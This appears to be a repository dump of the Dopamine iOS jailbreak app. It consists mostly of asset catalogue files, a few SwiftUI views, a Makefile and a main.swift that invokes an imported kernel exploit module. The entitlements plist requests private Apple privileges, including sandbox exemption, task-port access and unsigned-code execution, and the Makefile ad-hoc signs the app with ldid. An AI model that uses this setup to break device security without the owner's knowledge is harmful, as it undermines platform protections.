https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/pexels-soubhagya-maharana-4124435.jpg -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "filename" : "fr.png", 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/fr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/fr.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "DopamineLogo@1x.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "DopamineLogo@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "DopamineLogo@3x.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@1x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@1x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "DopamineLogo@1x.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "DopamineLogo@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "DopamineLogo@3x.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@1x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@1x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy 2.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Artboard copy.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Artboard.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Artboard copy 2.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | }, 23 | "properties" : { 24 | "template-rendering-intent" : "template" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Pinauten_Logo_SecResearch_4096 copy 2.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Pinauten_Logo_SecResearch_4096 copy.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Pinauten_Logo_SecResearch_4096.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | }, 23 | "properties" : { 24 | "template-rendering-intent" : "template" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy 2.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "discord-mark-white.png", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | }, 21 | "properties" : { 22 | "template-rendering-intent" : "template" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/discord-mark-white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/discord-mark-white.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "GitHub-Mark-64px.png", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | }, 21 | "properties" : { 22 | "template-rendering-intent" : "template" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/GitHub-Mark-64px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/GitHub-Mark-64px.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Sileo.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Sileo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Sileo.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Zebra.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Zebra.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Zebra.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_2048.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_2048.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_4096.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_4096.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Dopamine-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // Use this file to import your target's public headers that you would like to expose to Swift. 3 | // 4 | 5 | #include 6 | 7 | #include "LSApplicationProxy.h" 8 | #include "LSApplicationWorkspace.h" 9 | #include "constants.h" 10 | #include "posix_spawn.h" 11 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Dopamine.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.security.get-task-allow 6 | 7 | get-task-allow 8 | 9 | platform-application 10 | 11 | task_for_pid-allow 12 | 13 | run-unsigned-code 14 | 15 | proc_info-allow 16 | 17 | com.apple.private.persona-mgmt 18 | 19 | com.apple.private.tcc.allow 20 | 21 | kTCCServiceSystemPolicyAllFiles 22 | 23 | com.apple.private.security.storage-exempt.heritable 24 | 25 | com.apple.private.security.storage.AppBundles 26 | 27 | com.apple.private.security.no-sandbox 28 | 29 | com.apple.springboard.CFUserNotification 30 | 31 | com.apple.springboard.launchapplications 32 | 33 | com.apple.security.network.client 34 | 35 | com.apple.system-task-ports.control 36 | 37 | com.apple.system-task-ports.token.control 38 | 39 | com.apple.private.mobileinstall.allowedSPI 40 | 41 | InstallForLaunchServices 42 | Install 43 | UninstallForLaunchServices 44 | Uninstall 45 | UpdatePlaceholderMetadata 46 | 47 | com.apple.private.spawn-driver 48 | 49 | com.apple.developer.driverkit 50 | 51 | com.apple.developer.driverkit.transport.pci 52 | 53 | com.apple.developer.driverkit.builtin 54 | 55 | com.apple.developer.driverkit.transport.pci.offloadEngineDisable 56 | 57 | com.apple.private.security.kext-collection-management 58 | 59 | com.apple.private.security.kext-management 60 | 61 | com.apple.private.security.syspolicy.kext-management 62 | 63 | com.apple.security.exception.mach-lookup.global-name 64 | 65 | com.opa334.jailbreakd 66 | 67 | com.apple.security.exception.iokit-user-client-class 68 | 69 | AGXDeviceUserClient 70 | IOSurfaceRootUserClient 71 | 72 | com.apple.wifi.manager-access 73 | 74 | com.apple.security.exception.shared-preference.read-write 75 | 76 | com.opa334.Dopamine 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/DopamineApp.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Fugu15App.swift 3 | // Fugu15 4 | // 5 | // Created by Linus Henze. 6 | // 7 | 8 | import SwiftUI 9 | 10 | var whatCouldThisVariablePossiblyEvenMean = { 11 | let date = Date() 12 | let calendar = Calendar.current 13 | let components = calendar.dateComponents([.day, .month], from: date) 14 | 15 | return components.day == 1 && components.month == 4 16 | }() 17 | 18 | struct Fugu15App: App { 19 | var body: some Scene { 20 | WindowGroup { 21 | JailbreakView() 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | TSRootBinaries 6 | 7 | oobPCI 8 | tar 9 | 10 | UIViewControllerBasedStatusBarAppearance 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/JailbreakView.swift: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/JailbreakView.swift -------------------------------------------------------------------------------- /Dopamine/Dopamine/Preview Content/Preview Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Classes/Logger.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Logger.swift 3 | // Fugu15 4 | // 5 | // Created by exerhythm on 29.03.2023. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct LogMessage: Equatable, Identifiable { 11 | var id = UUID() 12 | var text: String 13 | var type: LogType 14 | 15 | enum LogType: RawRepresentable { 16 | case instant 17 | case continuous 18 | case success 19 | case error 20 | 21 | var rawValue: String { 22 | switch self { 23 | case .instant, .continuous: 24 | return "[*]" 25 | case .success: 26 | return "[+]" 27 | case .error: 28 | return "E:" 29 | } 30 | } 31 | 32 | init?(rawValue: String) { 33 | switch rawValue { 34 | case "[*]": 35 | self = .instant 36 | case "[+]": 37 | self = .success 38 | case "E:": 39 | self = .error 40 | default: 41 | return nil 42 | } 43 | } 44 | } 45 | } 46 | 47 | class Logger: ObservableObject { 48 | @Published var userFriendlyLogs: [LogMessage] = [] 49 | @Published var log: String = "" 50 | 51 | static var shared = Logger() 52 | 53 | /** 54 | * Add a string to log view. 55 | * 56 | * - Parameter text: The text to display 57 | * - Parameter isContinuous: Determines whether the action is instant or continuous, and if a spinner next to text should be shown 58 | * - Parameter isStatus: Should the log be displayed to users who have "Simple Logs" option turned on 59 | */ 60 | static func log(_ obj: Any, type: LogMessage.LogType = .continuous, isStatus: Bool = false) { 61 | let text = String(describing: obj) 62 | print(text) 63 | shared.log += "\n\(type.rawValue) \(text)" 64 | if isStatus { 65 | shared.userFriendlyLogs.append(.init(text: NSLocalizedString(text, comment: "Jailbreak Status"), type: type)) 66 | } 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Extensions/Error++.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Error++.swift 3 | // Fugu15 4 | // 5 | // Created by sourcelocation on 17/04/2023. 6 | // 7 | 8 | import Foundation 9 | 10 | extension String: LocalizedError { 11 | public var errorDescription: String? { return self } 12 | } 13 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Views/MaterialView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // MaterialView.swift 3 | // DebToIPA 4 | // 5 | // Created by exerhythm on 18.10.2022. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct MaterialView: UIViewRepresentable { 11 | let material: UIBlurEffect.Style 12 | 13 | init(_ material: UIBlurEffect.Style) { 14 | self.material = material 15 | } 16 | 17 | func makeUIView(context: Context) -> UIVisualEffectView { 18 | UIVisualEffectView(effect: UIBlurEffect(style: material)) 19 | } 20 | 21 | func updateUIView(_ uiView: UIVisualEffectView, context: Context) { 22 | uiView.effect = UIBlurEffect(style: material) 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Views/PopupView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // AlertView.swift 3 | // Dopamine 4 | // 5 | // Created by sourcelocation on 30/04/2023. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct PopupView: View { 11 | 12 | @ViewBuilder var title: Title 13 | @ViewBuilder var contents: Content 14 | 15 | @Binding var isPresented: Bool 16 | 17 | var body: some View { 18 | VStack { 19 | ZStack { 20 | if isPresented { 21 | Color.black 22 | .ignoresSafeArea() 23 | .opacity(0.6) 24 | .onTapGesture { 25 | isPresented = false 26 | } 27 | .zIndex(2) 28 | VStack { 29 | title 30 | 31 | Divider() 32 | .background(.white) 33 | .padding(.horizontal, 32) 34 | .opacity(0.25) 35 | .frame(maxWidth: 320) 36 | 37 | contents 38 | } 39 | .padding(.vertical) 40 | .transition(.opacity.combined(with: .scale(scale: 0.9))) 41 | .background(MaterialView(.systemUltraThinMaterialDark) 42 | .cornerRadius(16)) 43 | .zIndex(3) 44 | } 45 | 46 | } 47 | .foregroundColor(.white) 48 | .animation(.spring().speed(1.5), value: isPresented) 49 | } 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/bootstrap-iphoneos-arm64.tar.zst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/bootstrap-iphoneos-arm64.tar.zst -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/ellekit_1.0_iphoneos-arm64.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/ellekit_1.0_iphoneos-arm64.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/libjbdrw.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/libjbdrw.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/preferenceloader_2.2.6-1_iphoneos-arm64.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/preferenceloader_2.2.6-1_iphoneos-arm64.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/sileo.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/sileo.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/xinamine_1.0.6_iphoneos-arm64.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/xinamine_1.0.6_iphoneos-arm64.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/zebra.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/zebra.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/constants.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface Constants : NSObject 4 | + (NSString*)commitShortHash; 5 | + (NSString*)compileTime; 6 | + (NSString*)bundleID; 7 | @end 8 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/constants.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "constants.h" 3 | 4 | #define STRINGIZE(x) #x 5 | #define STRINGIZE2(x) STRINGIZE(x) 6 | 7 | #define _GIT_COMMIT_HASH GIT_COMMIT_HASH 8 | #define __GIT_COMMIT_HASH @STRINGIZE2(_GIT_COMMIT_HASH) 9 | 10 | #define _COMPILE_TIME COMPILE_TIME 11 | #define __COMPILE_TIME @STRINGIZE2(_COMPILE_TIME) 12 | 13 | #define _BUNDLE_ID BUNDLE_ID 14 | #define __BUNDLE_ID @STRINGIZE2(_BUNDLE_ID) 15 | 16 | @implementation Constants : NSObject 17 | + (NSString*)commitShortHash { 18 | return __GIT_COMMIT_HASH; 19 | } 20 | 21 | + (NSString*)compileTime { 22 | return __COMPILE_TIME; 23 | } 24 | 25 | + (NSString*)bundleID { 26 | return __BUNDLE_ID; 27 | } 28 | @end 29 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/include/_LSApplicationState.h: -------------------------------------------------------------------------------- 1 | /* 2 | * This header is generated by classdump-dyld 1.0 3 | * on Friday, January 21, 2022 at 6:51:04 AM Pacific Standard Time 4 | * Operating System: Version 15.2.1 (Build 19C63) 5 | * Image Source: /System/Library/Frameworks/CoreServices.framework/CoreServices 6 | * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. 7 | */ 8 | 9 | #import 10 | //#import 11 | //#import 12 | //#import 13 | 14 | @class NSString; 15 | 16 | @interface _LSApplicationState : NSObject { 17 | 18 | NSString* _bundleIdentifier; 19 | unsigned long long _stateFlags; 20 | int _ratingRank; 21 | unsigned long long _installType; 22 | 23 | } 24 | 25 | @property (nonatomic,readonly) unsigned long long installType; 26 | @property (nonatomic,copy,readonly) NSString * bundleIdentifier; //@synthesize bundleIdentifier=_bundleIdentifier - In the implementation block 27 | @property (getter=isInstalled,nonatomic,readonly) BOOL installed; 28 | @property (getter=isPlaceholder,nonatomic,readonly) BOOL placeholder; 29 | @property (getter=isValid,nonatomic,readonly) BOOL valid; 30 | @property (getter=isRestricted,nonatomic,readonly) BOOL restricted; 31 | @property (getter=isRemovedSystemApp,nonatomic,readonly) BOOL removedSystemApp; 32 | @property (getter=isBlocked,nonatomic,readonly) BOOL blocked; 33 | @property (getter=isAlwaysAvailable,nonatomic,readonly) BOOL alwaysAvailable; 34 | @property (getter=isDowngraded,nonatomic,readonly) BOOL downgraded; 35 | +(BOOL)supportsSecureCoding; 36 | -(BOOL)isInstalled; 37 | -(void)addStateFlag:(unsigned long long)arg1 ; 38 | -(void)encodeWithCoder:(id)arg1 ; 39 | -(BOOL)isRemovedSystemApp; 40 | -(unsigned long long)installType; 41 | -(BOOL)isPlaceholder; 42 | -(BOOL)isRestricted; 43 | -(BOOL)isBlocked; 44 | -(id)description; 45 | -(id)initWithBundleIdentifier:(id)arg1 stateFlags:(unsigned long long)arg2 ratingRank:(int)arg3 installType:(unsigned long long)arg4 ; 46 | -(id)initWithCoder:(id)arg1 ; 47 | -(id)copyWithZone:(NSZone*)arg1 ; 48 | -(NSString *)bundleIdentifier; 49 | -(BOOL)isDowngraded; 50 | -(BOOL)isAlwaysAvailable; 51 | -(BOOL)isValid; 52 | @end 53 | 54 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/main.swift: -------------------------------------------------------------------------------- 1 | // 2 | // main.swift 3 | // Fugu15 4 | // 5 | // Created by Linus Henze on 2022-07-29. 6 | // 7 | 8 | import Foundation 9 | import Fugu15KernelExploit 10 | 11 | if CommandLine.arguments.count > 1 { 12 | switch CommandLine.arguments[1] { 13 | case "removeFuguInstallPlist": 14 | let path = Bundle.main.bundleURL 15 | 16 | let plist = path.appendingPathComponent("FuguInstall.plist") 17 | try? FileManager.default.removeItem(at: plist) 18 | 19 | exit(0) 20 | 21 | default: 22 | break 23 | } 24 | } 25 | 26 | Fugu15.mainHook() 27 | 28 | if isJailbroken() { 29 | let rootPrefix = rootifyPath(path: "") 30 | if rootPrefix != nil { 31 | setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:\(rootPrefix!)/sbin:\(rootPrefix!)/bin:\(rootPrefix!)/usr/sbin:\(rootPrefix!)/usr/bin", 1) 32 | } 33 | 34 | let dpDefaults = dopamineDefaults() 35 | let safeModePath = rootifyPath(path: "basebin/.safe_mode") 36 | let safeModeState = FileManager.default.fileExists(atPath: safeModePath!) 37 | dpDefaults.set(!safeModeState, forKey: "tweakInjectionEnabled") 38 | } 39 | 40 | Fugu15App.main() 41 | -------------------------------------------------------------------------------- /Dopamine/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: all clean build_clean 2 | 3 | all: Dopamine.tipa 4 | 5 | Dopamine.tipa: build/Build/Products/Debug-iphoneos/Dopamine.app 6 | @echo Ad-Hoc signing Dopamine 7 | xattr -rc build/Build/Products/Debug-iphoneos/Dopamine.app 8 | ldid -SDopamine/Dopamine.entitlements build/Build/Products/Debug-iphoneos/Dopamine.app/Dopamine 9 | ldid -s build/Build/Products/Debug-iphoneos/Dopamine.app 10 | rm -rf Payload Dopamine.tipa 11 | mkdir Payload 12 | cp -r build/Build/Products/Debug-iphoneos/Dopamine.app Payload/Dopamine.app 13 | zip -Ar Dopamine.tipa Payload 14 | rm -rf Payload 15 | 16 | build/Build/Products/Debug-iphoneos/Dopamine.app: FORCE 17 | xcodebuild -scheme Dopamine \ 18 | -derivedDataPath build \ 19 | -destination 'generic/platform=iOS' \ 20 | CODE_SIGN_IDENTITY="" \ 21 | CODE_SIGNING_REQUIRED=NO \ 22 | 